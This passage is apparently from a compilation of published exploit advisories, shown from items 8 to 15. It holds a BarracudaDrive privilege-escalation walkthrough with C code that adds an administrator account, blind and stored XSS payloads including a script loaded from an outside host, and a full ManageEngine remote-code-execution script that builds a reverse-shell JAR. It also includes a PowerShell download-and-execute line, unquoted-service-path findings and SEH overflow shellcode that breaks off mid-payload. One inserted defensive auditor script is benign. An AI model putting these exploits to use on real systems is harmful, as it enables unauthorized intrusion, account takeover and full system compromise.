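    print("BloodX clause as MySQL sees it:", bloodx_where(BLOODX_EMAIL, BLOODX_EMAIL))
```

     The `-- hyd3sec` tail matters: it comments out the `AND Password=...` half, so the md5 of `badPass` never has to match anything. The hardened version is not "escape the quote" but "never let the value reach the parser as SQL"; with placeholders the same payload simply fails to match an e-mail.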
  8. # Exploit Title: BarracudaDrive v6.5 - Insecure Folder Permissions
     # Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
     # CVE ID: N/A
     # Date: 2020-09-01
     # Vendor Homepage: https://barracudaserver.com/
     # Software Link: https://download.cnet.com/BarracudaDrive/3001-18506_4-10723210.html
     # Version: v6.5
     # Tested On: Windows 10 Pro
     # CVSS Base Score: 8.8 | Impact Subscore: 6.0 | Exploitability Subscore: 2.0
     # CVSS Vector: AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
     # CWE-276: Incorrect Default Permissions
     # CWE-732: Incorrect Permission Assignment for Critical Resource
     # Vulnerability Description:
     # Insecure Service File Permissions in the bd service in Real Time Logic's BarracudaDrive v6.5
     # allow a local low-privilege attacker to escalate privileges to admin by replacing the bd.exe
     # file and restarting the computer, where the malicious code will be executed as 'LocalSystem'
     # on the next startup.

     ## Insecure Folder Permission
     C:\>cacls C:\bd
     C:\bd BUILTIN\Administrators:(OI)(CI)(ID)F
           NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
           BUILTIN\Users:(OI)(CI)(ID)R
           NT AUTHORITY\Authenticated Users:(ID)C
           NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C

     ## Insecure File/Service Permission
     C:\>cacls C:\bd\bd.exe
     C:\bd\bd.exe BUILTIN\Administrators:(ID)F
                  NT AUTHORITY\SYSTEM:(ID)F
                  BUILTIN\Users:(ID)R
                  NT AUTHORITY\Authenticated Users:(ID)C

     C:\>sc qc bd
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: bd
             TYPE               : 10  WIN32_OWN_PROCESS
             START_TYPE         : 2   AUTO_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : "C:\bd\bd.exe"
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : BarracudaDrive ( bd ) service
             DEPENDENCIES       : Tcpip
             SERVICE_START_NAME : LocalSystem

     ## Local Privilege Escalation Proof of Concept
     #0. Download & install
     #1. Create a low privileged user & change to that user
     ## As admin
     C:\>net user lowpriv Password123! /add
     C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"
     User name                    lowpriv
     Local Group Memberships      *Users
     Global Group memberships     *None

     #2. Move the Service EXE to a new name
     C:\bd>whoami
     desktop\lowpriv
     C:\bd>move bd.exe bd.service.exe
             1 file(s) moved.

     #3. Create the malicious binary on Kali Linux
     ## Add Admin User C Code
     kali# cat addAdmin.c
     #include <stdlib.h>
     #include <windows.h>

     int main(void){
         system("net user boku mypassword /add");
         system("net localgroup Administrators boku /add");
         WinExec("C:\\bd\\bd.service.exe",0);   /* hand over to the real service binary */
         return 0;
     }
     ## Compile Code
     kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o bd.exe

     #4. Transfer the created 'bd.exe' to the Windows Host
     #5. Move the created 'bd.exe' binary to the 'C:\bd\' Folder
     C:\bd>move C:\Users\lowpriv\Downloads\bd.exe .

     #6. Check that the exploit admin user doesn't exist yet
     C:\bd>net user boku
     The user name could not be found

     #7. Reboot the Computer
     C:\bd>shutdown /r

     #8. Log in & look at that new Admin
     C:\Users\lowpriv>net user boku | findstr /i "Membership Name" | findstr /v "Full"
     User name                    boku
     Local Group Memberships      *Administrators       *Users
     Global Group memberships     *None
  9. # Exploit Title: Nord VPN-6.31.13.0 - 'nordvpn-service' Unquoted Service Path
     # Discovery Date: 2020-09-03
     # Discovery by: chipo
     # Vendor Homepage: https://nordvpn.com
     # Software Link : https://downloads.nordcdn.com/apps/windows/10/NordVPN/latest/NordVPNSetup.exe
     # Tested Version: 6.31.13.0
     # Tested on OS: Windows 10 Pro x64 es
     # Vulnerability Type: Unquoted Service Path

     # Find the Unquoted Service Path vulnerability:
     C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ovpnconnect" | findstr /i /v """
     nordvpn-service    nordvpn-service    C:\Program Files\NordVPN\nordvpn-service.exe

     # Service info (labels translated from the Spanish-localized sc output):
     C:\>sc qc servicio
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: nordvpn-service
             TYPE               : 10  WIN32_OWN_PROCESS
             START_TYPE         : 2   AUTO_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Program Files\NordVPN\nordvpn-service.exe
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : nordvpn-service
             DEPENDENCIES       :
             SERVICE_START_NAME : LocalSystem

     # Exploit:
     A successful attempt to exploit this vulnerability could allow code execution during startup or reboot with elevated privileges.
  10. # Exploit Title: Cabot 0.11.12 - Persistent Cross-Site Scripting
     # Date: 2020-09-06
     # Exploit Author: Abhiram V
     # Vendor Homepage: https://cabotapp.com/
     # Software Link: https://github.com/arachnys/cabot
     # Version: 0.11.12
     # Tested on: Ubuntu Linux
     ############################################################################
     Introduction

     Cabot is a free, open-source, self-hosted infrastructure monitoring platform that provides some of the best features of PagerDuty, Server Density, Pingdom and Nagios without their cost and complexity. It provides a web interface that allows us to monitor services and send telephone, SMS or HipChat/email alerts to your on-duty team if those services start misbehaving or go down.
     ############################################################################
     XSS details: Blind XSS
     ############################################################################
     Executing Blind XSS in New Instances leads to admin account takeover

     URL
     http://127.0.0.1:5000/instance/create/

     PAYLOAD
     "><script src=https://anonart.xss.ht></script>
     *payload from the xsshunter.com platform for finding blind XSS*

     PARAMETER
     Address column

     EXPLOITATION
     Create a user account under the Django administrator account and log in as that user to perform the attack.
     Create a new instance and save it, then navigate to Services.
     Create a new Service, then input a Name and URL (for the PoC I used BlindXSS in both columns).
     Then add the admin account in the "Users to notify" column, select the status check and the instances, then save.
     Now the admin account gets a notification; when the admin runs the check, the blind XSS executes in the background.
     On logging in to xsshunter.com we can see the screenshots, cookies and all details of the admin account.

     IMPACT
     Stored XSS can be executed from any account and triggered in any account, including Django administration, unknowingly by the victim (here it is admin), and compromise the accounts.
     Tested in both xsshunter.com and blindf.com. Attacker can also use stored XSS payloads here.
     ############################################################################
  11. #!/usr/bin/python3
     # Exploit Title: ManageEngine Applications Manager 14700 - Remote Code Execution (Authenticated)
     # Google Dork: None
     # Date: 2020-09-04
     # Exploit Author: Hodorsec
     # Vendor Homepage: https://manageengine.co.uk
     # Vendor Vulnerability Description: https://manageengine.co.uk/products/applications_manager/security-updates/security-updates-cve-2020-14008.html
     # Software Link: http://archives.manageengine.com/applications_manager/14720/
     # Version: Until version 14720
     # Tested on: version 12900 and version 14700
     # CVE : CVE-2020-14008

     # Summary:
     # POC for proving the ability to execute malicious Java code in an uploaded JAR file, used as an Oracle Weblogic library to connect to Weblogic servers
     # Exploits the newInstance() and loadClass() methods used by the "WeblogicReference" when attempting a Credential Test for a new Monitor
     # When invoking the Credential Test, a call is made to look up a possibly existing "weblogic.jar" JAR file, using the "weblogic.jndi.Environment" class and method

     # Vulnerable code:
     # Lines 129 - 207 in com/adventnet/appmanager/server/wlogic/statuspoll/WeblogicReference.java
     # 129 /*     */   public static MBeanServer lookupMBeanServer(String hostname, String portString, String username, String password, int version) throws Exception {
     # 130 /* 130 */     ClassLoader current = Thread.currentThread().getContextClassLoader();
     # 131 /*     */     try {
     # 132 /* 132 */       boolean setcredentials = false;
     # 133 /* 133 */       String url = "t3://" + hostname + ":" + portString;
     # 134 /* 134 */       JarLoader jarLoader = null;
     # 135 /*     */
     # ....<SNIP>....
     # 143 /*     */       }
     # 144 /* 144 */       else if (version == 8)
     # 145 /*     */       {
     # 146 /* 146 */         if (new File("./../working/classes/weblogic/version8/weblogic.jar").exists())
     # 147 /*     */         {
     # 148 /*     */
     # 149 /* 149 */           jarLoader = new JarLoader("." + File.separator + ".." + File.separator + "working" + File.separator + "classes" + File.separator + "weblogic" + File.separator + "version8" + File.separator + "weblogic.jar");
     # 150 /*     */
     # ....<SNIP>....
     # 170 /* 170 */       Thread.currentThread().setContextClassLoader(jarLoader);
     # 171 /* 171 */       Class cls = jarLoader.loadClass("weblogic.jndi.Environment");
     # 172 /* 172 */       Object env = cls.newInstance();

     # Example call for MAM version 12900:
     # $ python3 poc_mam_weblogic_upload_and_exec_jar.py https://192.168.252.12:8443 admin admin weblogic.jar
     # [*] Visiting page to retrieve initial cookies...
     # [*] Retrieving admin cookie...
     # [*] Getting base directory of ManageEngine...
     # [*] Found base directory: C:\Program Files (x86)\ManageEngine\AppManager12
     # [*] Creating JAR file...
     # Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
     # Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
     # added manifest
     # adding: weblogic/jndi/Environment.class(in = 1844) (out= 1079)(deflated 41%)
     # [*] Uploading JAR file...
     # [*] Attempting to upload JAR directly to targeted Weblogic folder...
     # [*] Copied successfully via Directory Traversal, jumping directly to call vulnerable function!
     # [*] Running the Weblogic credentialtest which triggers the code in the JAR...
     # [*] Check your shell...

     # Function flow:
     # 1. Get initial cookie
     # 2. Get valid session cookie by logging in
     # 3. Get base directory of installation
     # 4. Generate a malicious JAR file
     # 5. Attempt to directly upload JAR, if success, jump to 7
     # 6. Create task with random ID to copy JAR file to expected Weblogic location
     # 7. Execute task
     # 8. Delete task for cleanup
     # 9. Run the vulnerable credentialTest, using the malicious JAR

     import requests
     import urllib3
     import shutil
     import subprocess
     import os
     import sys
     import random
     import re
     from lxml import html

     # Optionally, use a proxy
     # proxy = "http://<user>:<pass>@<proxy>:<port>"
     proxy = ""
     os.environ['http_proxy'] = proxy
     os.environ['HTTP_PROXY'] = proxy
     os.environ['https_proxy'] = proxy
     os.environ['HTTPS_PROXY'] = proxy

     # Disable cert warnings
     urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

     # Set timeout
     timeout = 10


     # Handle CTRL-C
     def keyboard_interrupt():
         """Handles keyboardinterrupt exceptions"""
         print("\n\n[*] User requested an interrupt, exiting...")
         exit(0)


     # Custom headers
     def http_headers():
         headers = {
             'User-Agent': 'Mozilla',
         }
         return headers


     def get_initial_cookie(url, headers):
         print("[*] Visiting page to retrieve initial cookies...")
         target = url + "/index.do"
         r = requests.get(target, headers=headers, timeout=timeout, verify=False)
         return r.cookies


     def get_valid_cookie(url, headers, initial_cookies, usern, passw):
         print("[*] Retrieving admin cookie...")
         appl_cookie = "JSESSIONID_APM_9090"
         post_data = {'clienttype': 'html',
                      'webstart': '',
                      'j_username': usern,
                      'ScreenWidth': '1280',
                      'ScreenHeight': '709',
                      'username': usern,
                      'j_password': passw,
                      'submit': 'Login'}
         target = url + "/j_security_check"
         r = requests.post(target, data=post_data, headers=headers, cookies=initial_cookies, timeout=timeout, verify=False)
         res = r.text
         if "Server responded in " in res:
             return r.cookies
         else:
             print("[!] No valid response from used session, exiting!\n")
             exit(-1)


     def get_base_dir(url, headers, valid_cookie):
         print("[*] Getting base directory of ManageEngine...")
         target = url + "/common/serverinfo.do"
         params = {'service': 'AppManager',
                   'reqForAdminLayout': 'true'}
         r = requests.get(target, params=params, headers=headers, cookies=valid_cookie, timeout=timeout, verify=False)
         tree = html.fromstring(r.content)
         pathname = tree.xpath('//table[@class="lrbtborder"]/tr[6]/td[2]/@title')
         base_dir = pathname[0]
         print("[*] Found base directory: " + base_dir)
         return base_dir


     def create_jar(command, jarname, revhost, revport):
         print("[*] Creating JAR file...")
         # Variables
         classname = "Environment"
         pkgname = "weblogic.jndi"
         fullname = pkgname + "." + classname
         manifest = "MANIFEST.MF"
         # Directory variables
         curdir = os.getcwd()
         metainf_dir = "META-INF"
         maindir = "weblogic"
         subdir = maindir + "/jndi"
         builddir = curdir + "/" + subdir
         # Check if the directory exists, else create it
         try:
             if os.path.isdir(builddir):
                 pass
             else:
                 os.makedirs(builddir)
         except OSError:
             print("[!] 
Error creating local directory \"" + builddir + "\", check permissions...") exit(-1) # Creating the text file using given parameters javafile = '''package ''' + pkgname + '''; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.net.Socket; import java.util.concurrent.TimeUnit; public class ''' + classname + ''' { // This method is being called by lookupMBeanServer() in com/adventnet/appmanager/server/wlogic/statuspoll/WeblogicReference.java // Uses the jarLoader.loadClass() method to load and initiate a new instance via newInstance() public void setProviderUrl(String string) throws Exception { System.out.println("Hello from setProviderUrl()"); connect(); } // Normal main() entry public static void main(String args[]) throws Exception { System.out.println("Hello from main()"); // Added delay to notice being called from main() TimeUnit.SECONDS.sleep(10); connect(); } // Where the magic happens public static void connect() throws Exception { String host = "''' + revhost + '''"; int port = ''' + str(revport) + '''; String[] cmd = {"''' + command + '''"}; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start(); Socket s=new Socket(host,port); InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream(); OutputStream po=p.getOutputStream(),so=s.getOutputStream(); while(!s.isClosed()) { while(pi.available()>0) so.write(pi.read()); while(pe.available()>0) so.write(pe.read()); while(si.available()>0) po.write(si.read()); so.flush(); po.flush(); try { p.exitValue(); break; } catch (Exception e){ } }; p.destroy(); s.close(); } }''' # Output file to desired directory os.chdir(builddir) print(javafile,file=open(classname + ".java","w")) # Go to previous directory to create JAR file os.chdir(curdir) # Create the compiled .class file cmdCompile = "javac --release 7 " + subdir + "/*.java" process = subprocess.call(cmdCompile,shell=True) # Creating Manifest file try: if os.path.isdir(metainf_dir): pass else: 
os.makedirs(metainf_dir) except OSError: print("[!] Error creating local directory \"" + metainf_dir + "\", check permissions...") exit(-1) print("Main-Class: " + fullname,file=open(metainf_dir + "/" + manifest,"w")) # Create JAR file cmdJar = "jar cmvf " + metainf_dir + "/" + manifest + " " + jarname + " " + subdir + "/*.class" process = subprocess.call(cmdJar,shell=True) # Cleanup directories try: shutil.rmtree(metainf_dir) shutil.rmtree(maindir) except: print("[!] Error while cleaning up directories.") return True def upload_jar(url,headers,valid_cookie,jarname,rel_path): print("[*] Uploading JAR file...") target = url + "/Upload.do" path_normal = './' path_trav = rel_path jar = {'theFile':(jarname,open(jarname, 'rb'))} print("[*] Attempting to upload JAR directly to targeted Weblogic folder...") post_data = {'uploadDir':path_trav} r_upload = requests.post(target, data=post_data, headers=headers, files=jar, cookies=valid_cookie, timeout=timeout,verify=False) res = r_upload.text if "successfully uploaded" not in res: print("[!] Failed to upload JAR directly, continue to add and execute job to move JAR...") post_data = {'uploadDir':path_normal} jar = {'theFile':(jarname,open(jarname, 'rb'))} r_upload = requests.post(target, data=post_data, headers=headers, files=jar, cookies=valid_cookie, timeout=timeout,verify=False) return "normal_path" else: print("[*] Copied successfully via Directory Traversal, jumping directly to call vulnerable function!") return "trav_path" def create_task(url,headers,valid_cookie,action_name,rel_path,work_dir): print("[*] Creating a task to move the JAR file to relative path: " + rel_path + "...") valid_resp = "Execute Program succesfully created." 
target = url + "/adminAction.do" post_data = {'actions':'/adminAction.do?method=showExecProgAction&haid=null', 'method':'createExecProgAction', 'id':'0', 'displayname':action_name, 'serversite':'local', 'choosehost':'-2', 'prompt':'$', 'command':'move weblogic.jar ' + rel_path, 'execProgExecDir':work_dir, 'abortafter':'10', 'cancel':'false'} r = requests.post(target,data=post_data,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False) res = r.text found_id = "" if action_name in res: tree = html.fromstring(r.content) actionurls = tree.xpath('//table[@id="executeProgramActionTable"]/tr[@class="actionsheader"]/td[2]/a/@onclick') actionnames = tree.xpath('//table[@id="executeProgramActionTable"]/tr[@class="actionsheader"]/td[2]/a/text()') i = 0 for name in actionnames: for url in actionurls: if action_name in name: found_id = re.search(".*actionid=(.+?)','", actionurls[i]).group(1) print("[*] Found actionname: " + action_name + " with found actionid " + found_id) break i+=1 return found_id else: print("[!] Actionname not found. Task probably wasn't created, please check. Exiting.") exit(-1) def exec_task(url,headers,valid_cookie,found_id): print("[*] Executing created task with id: " + found_id + " to copy JAR...") valid_resp = "has been successfully executed" target = url + "/common/executeScript.do" params = {'method':'testAction', 'actionID':found_id, 'haid':'null'} r = requests.get(target,params=params,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False) res = r.text if valid_resp in res: print("[*] Task " + found_id + " has been executed successfully") else: print("[!] Task not executed. 
Check requests, exiting...") exit(-1) return def del_task(url,headers,valid_cookie,found_id): print("[*] Deleting created task as JAR has been copied...") target = url + "/adminAction.do" params = {'method':'deleteProgExecAction'} post_data = {'haid':'null', 'headercheckbox':'on', 'progcheckbox':found_id} r = requests.post(target,params=params,data=post_data,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False) def run_credtest(url,headers,valid_cookie): print("[*] Running the Weblogic credentialtest which triggers the code in the JAR...") target = url + "/testCredential.do" post_data = {'method':'testCredentialForConfMonitors', 'serializedData':'url=/jsp/newConfType.jsp', 'searchOptionValue':'', 'query':'', 'addtoha':'null', 'resourceid':'', 'montype':'WEBLOGIC:7001', 'isAgentEnabled':'NO', 'resourcename':'null', 'isAgentAssociated':'false', 'hideFieldsForIT360':'null', 'childNodesForWDM':'[]', 'csrfParam':'', 'type':'WEBLOGIC:7001', 'displayname':'test', 'host':'localhost', 'netmask':'255.255.255.0', 'resolveDNS':'False', 'port':'7001', 'CredentialDetails':'nocm', 'cmValue':'-1', 'version':'WLS_8_1', 'sslenabled':'False', 'username':'test', 'password':'test', 'pollinterval':'5', 'groupname':''} print("[*] Check your shell...") requests.post(target,data=post_data,headers=headers,cookies=valid_cookie,verify=False) return # Main def main(argv): if len(sys.argv) == 6: url = sys.argv[1] usern = sys.argv[2] passw = sys.argv[3] revhost = sys.argv[4] revport = sys.argv[5] else: print("[*] Usage: " + sys.argv[0] + " <url> <username> <password> <reverse_shell_host> <reverse_shell_port>") print("[*] Example: " + sys.argv[0] + " https://192.168.252.12:8443 admin admin 192.168.252.14 6666\n") exit(0) # Do stuff try: # Set HTTP headers headers = http_headers() # Relative path to copy the malicious JAR file rel_path = "classes/weblogic/version8/" # Generate a random ID to use for the task name and task tracking random_id = str(random.randrange(0000,9999)) # 
Action_name used for displaying actions in overview action_name = "move_weblogic_jar" + random_id # Working dir to append to base dir base_append = "\\working\\" # Name for JAR file to use jarname = "weblogic.jar" # Command shell to use cmd = "cmd.exe" # Execute functions initial_cookies = get_initial_cookie(url,headers) valid_cookie = get_valid_cookie(url,headers,initial_cookies,usern,passw) work_dir = get_base_dir(url,headers,valid_cookie) + base_append create_jar(cmd,jarname,revhost,revport) status_jar = upload_jar(url,headers,valid_cookie,jarname,rel_path) # Check if JAR can be uploaded via Directory Traversal # If so, no need to add and exec actions; just run the credentialtest directly if status_jar == "trav_path": run_credtest(url,headers,valid_cookie) # Cannot be uploaded via Directory Traversal, add and exec actions to move JAR. Lastly, run the vulnerable credentialtest elif status_jar == "normal_path": found_id = create_task(url,headers,valid_cookie,action_name,rel_path,work_dir) exec_task(url,headers,valid_cookie,found_id) del_task(url,headers,valid_cookie,found_id) run_credtest(url,headers,valid_cookie) except requests.exceptions.Timeout: print("[!] Timeout error\n") exit(-1) except requests.exceptions.TooManyRedirects: print("[!] Too many redirects\n") exit(-1) except requests.exceptions.ConnectionError: print("[!] Not able to connect to URL\n") exit(-1) except requests.exceptions.RequestException as e: print("[!] " + e) exit(-1) except requests.exceptions.HTTPError as e: print("[!] Failed with error code - " + e.code + "\n") exit(-1) except KeyboardInterrupt: keyboard_interrupt() # If we were called as a program, go execute the main function. if __name__ == "__main__": main(sys.argv[1:])
12.
# Exploit Title: grocy 2.7.1 - Persistent Cross-Site Scripting
# Date: 2020-09-06
# Exploit Author: Mufaddal Masalawala
# Vendor Homepage: https://berrnd.de/
# Software Link: https://github.com/grocy/grocy
# Version: 2.7.1
# Tested on: Kali Linux 2020.3

# Proof Of Concept:
grocy household management solution v2.7.1 allows stored XSS and HTML Injection via the Create Shopping List module; the payload is rendered upon deleting that Shopping List.

To exploit this vulnerability:
1. Login to the application
2. Go to 'Shopping List' module
3. Click on 'New Shopping List' module
4. Enter the payload: <marquee onstart=alert(document.cookie)> in 'Name' input field.
5. Click Save
6. Click 'Delete Shopping List'

#REQUEST -->

POST /api/objects/shopping_lists HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/shoppinglist/new
Content-type: application/json
Content-Length: 38
Connection: close
Cookie: grocy_session=GhIjKZyST7Qkx18Q97u9MaPM1LsMtBmcJ6I59gxTO3Ks4WJXUd

{"name":"<marquee onstart=alert(1)> "}

#RESPONSE -->

HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sun, 06 Sep 2020 12:53:13 GMT
Content-Type: application/json
Connection: close
X-Powered-By: PHP/7.3.21
Content-Length: 26

{"created_object_id":"21"}

Regards,
Mufaddal M
13.
# Exploit Title: ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path
# Discovery Date: 2020-09-08
# Discovery by: Alan Lacerda (alacerda)
# Vendor Homepage: https://www.sharemouse.com/
# Software Link: https://www.sharemouse.com/ShareMouseSetup.exe
# Version: 5.0.43
# Tested on OS: Microsoft Windows 10 Pro EN
# OS Version: 10.0.19041

PS > iex (iwr https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 -UseBasicParsing);
PS > Invoke-AllChecks

ServiceName   : ShareMouse Service
Path          : C:\Program Files (x86)\ShareMouse\smService.exe
StartName     : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'ShareMouse Service' -Path <HijackPath>

PS > wmic service where 'name like "%ShareMouse%"' get DisplayName,PathName,AcceptStop,StartName

AcceptStop  DisplayName         PathName                                         StartName
TRUE        ShareMouse Service  C:\Program Files (x86)\ShareMouse\smService.exe  LocalSystem

#Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
14.
# Exploit Title: Input Director 1.4.3 - 'Input Director' Unquoted Service Path
# Discovery Date: 2020-09-08
# Response from Input Director Support: 09/09/2020
# Exploit Author: TOUHAMI Kasbaoui
# Vendor Homepage: https://www.inputdirector.com/
# Version: 1.4.3
# Tested on: Windows Server 2012, Windows 10

# Find the Unquoted Service Path Vulnerability:

C:\wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Input Director Service  InputDirector  C:\Program Files (x86)\InputDirector\IDWinService.exe  Auto

# Service info:

C:\sc qc IDWinService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: InputDirector
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Input Director\IDWinService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Input Director Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Exploit:
A successful attempt to exploit this vulnerability could allow executing code during startup or reboot with the elevated privileges.
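Defender-side counterpart to the two unquoted-service-path advisories above (ShareMouse and Input Director). This is an added example, not code from either advisory: it parses `sc qc` output and flags every service whose BINARY_PATH_NAME is unquoted and contains spaces, listing the executable names Windows would try before the intended binary. The Input Director record is the one shown above; the second, properly quoted record (ExampleSvc) is constructed for contrast.

```python
"""Audit `sc qc` records for unquoted service image paths (added example)."""
import re
from typing import Dict, List

# Constructed samples: the Input Director record from the advisory above, plus a
# made-up service whose path is quoted correctly.
SC_QC_SAMPLES = [
    r"""SERVICE_NAME: InputDirector
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files (x86)\Input Director\IDWinService.exe
        SERVICE_START_NAME : LocalSystem
""",
    r"""SERVICE_NAME: ExampleSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : "C:\Program Files\Example\svc.exe" -k netsvcs
        SERVICE_START_NAME : LocalSystem
""",
]

# One "FIELD : value" line of sc qc output
_FIELD = re.compile(r"^\s*(\w+)\s*:\s*(.*?)\s*$", re.MULTILINE)


def parse_sc_qc(text: str) -> Dict[str, str]:
    """Turn one `sc qc` record into a field -> value dict."""
    return {m.group(1): m.group(2) for m in _FIELD.finditer(text)}


def ambiguous_prefixes(image_path: str) -> List[str]:
    """Executable names Windows may resolve before the intended binary.

    Simplified model of how CreateProcess handles an unquoted command line:
    the string is split at each space and every prefix, with .exe appended,
    is a candidate until a prefix that already ends in .exe is reached (that
    prefix is the real binary and what follows are its arguments). A quoted
    path, or one without spaces, is unambiguous and yields an empty list.
    """
    p = image_path.strip()
    if p.startswith('"') or " " not in p:
        return []
    parts = p.split(" ")
    candidates = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        if prefix.lower().endswith(".exe"):
            break
        candidates.append(prefix + ".exe")
    return candidates


def audit(records: List[str]) -> List[dict]:
    """Return one finding per service with an unquoted, space-containing path."""
    findings = []
    for rec in records:
        fields = parse_sc_qc(rec)
        path = fields.get("BINARY_PATH_NAME", "")
        cands = ambiguous_prefixes(path)
        if cands:
            findings.append({
                "service": fields.get("SERVICE_NAME"),
                "runs_as": fields.get("SERVICE_START_NAME"),
                "auto_start": "AUTO_START" in fields.get("START_TYPE", ""),
                "path": path,
                "ambiguous_prefixes": cands,
            })
    return findings


if __name__ == "__main__":
    for f in audit(SC_QC_SAMPLES):
        print(f"{f['service']} (runs as {f['runs_as']}, auto-start={f['auto_start']}): {f['path']}")
        for c in f["ambiguous_prefixes"]:
            print("    resolved before the real binary:", c)
```

Run against real output by feeding it the text of `sc qc <name>` for each service (or the registry ImagePath values). The fix is to quote the path, for example `sc config InputDirector binPath= "\"C:\Program Files (x86)\Input Director\IDWinService.exe\""` (note the space after `binPath=`), and then to confirm that none of the listed prefix directories is writable by standard users; an auto-start service running as LocalSystem, as both advisories show, is the case that matters most.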
15.
# Exploit Title: Audio Playback Recorder 3.2.2 - Local Buffer Overflow (SEH)
# Date: 2020-09-08
# Author: Felipe Winsnes
# Software Link: https://archive.org/download/tucows_288670_Audio_Playback_Recorder/AudioRec.exe
# Version: 3.2.2
# Tested on: Windows 7 (x86)
# Blog: https://whitecr0wz.github.io/
# Proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings11/11-proof.gif

# Proof of Concept:
# 1.- Run the python script, it will create the file "poc.txt" & "buf.txt".
# 2.- Copy the content of the new file "buf.txt" to clipboard.
# 3.- Open the application.
# 4.- Click on the bottom-right blue button to eject.
# 5.- Delete everything on the parameter and paste the clipboard (buf.txt).
# 6.- Click eject once again to close it.
# 7.- Copy poc.txt to the clipboard.
# 8.- Click on "Register".
# 9.- Paste clipboard (poc.txt) on the parameter "Name".
# 10.- Profit.

import struct

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread
# Payload size: 447 bytes
# Prefixed with the "w00tw00t" tag the egghunter below searches for
buf = b"w00tw00t"
buf += b"\x89\xe2\xda\xd4\xd9\x72\xf4\x59\x49\x49\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37"
buf += b"\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
buf += b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
buf += b"\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x4b\x58\x6d\x52"
buf += b"\x63\x30\x47\x70\x63\x30\x61\x70\x6b\x39\x4a\x45\x65"
buf += b"\x61\x4f\x30\x33\x54\x6e\x6b\x30\x50\x66\x50\x6c\x4b"
buf += b"\x62\x72\x54\x4c\x4c\x4b\x33\x62\x32\x34\x4c\x4b\x42"
buf += b"\x52\x64\x68\x64\x4f\x4d\x67\x42\x6a\x37\x56\x36\x51"
buf += b"\x39\x6f\x4e\x4c\x67\x4c\x50\x61\x31\x6c\x45\x52\x36"
buf += b"\x4c\x45\x70\x7a\x61\x78\x4f\x46\x6d\x37\x71\x4a\x67"
buf += b"\x79\x72\x78\x72\x36\x32\x43\x67\x6e\x6b\x56\x32\x34"
buf += b"\x50\x6e\x6b\x51\x5a\x77\x4c\x6e\x6b\x52\x6c\x74\x51"
buf += b"\x34\x38\x49\x73\x53\x78\x67\x71\x48\x51\x30\x51\x6e"
buf += b"\x6b\x62\x79\x37\x50\x56\x61\x6a\x73\x6c\x4b\x63\x79"
buf += b"\x45\x48\x79\x73\x47\x4a\x42\x69\x6c\x4b\x44\x74\x6c"
buf += b"\x4b\x56\x61\x68\x56\x76\x51\x59\x6f\x4c\x6c\x79\x51"
buf += b"\x58\x4f\x54\x4d\x77\x71\x39\x57\x76\x58\x4b\x50\x53"
buf += b"\x45\x38\x76\x47\x73\x71\x6d\x5a\x58\x37\x4b\x31\x6d"
buf += b"\x46\x44\x71\x65\x4a\x44\x33\x68\x4e\x6b\x36\x38\x57"
buf += b"\x54\x36\x61\x6a\x73\x43\x56\x6c\x4b\x54\x4c\x50\x4b"
buf += b"\x6c\x4b\x36\x38\x57\x6c\x75\x51\x6b\x63\x4c\x4b\x45"
buf += b"\x54\x4c\x4b\x65\x51\x6a\x70\x6f\x79\x73\x74\x57\x54"
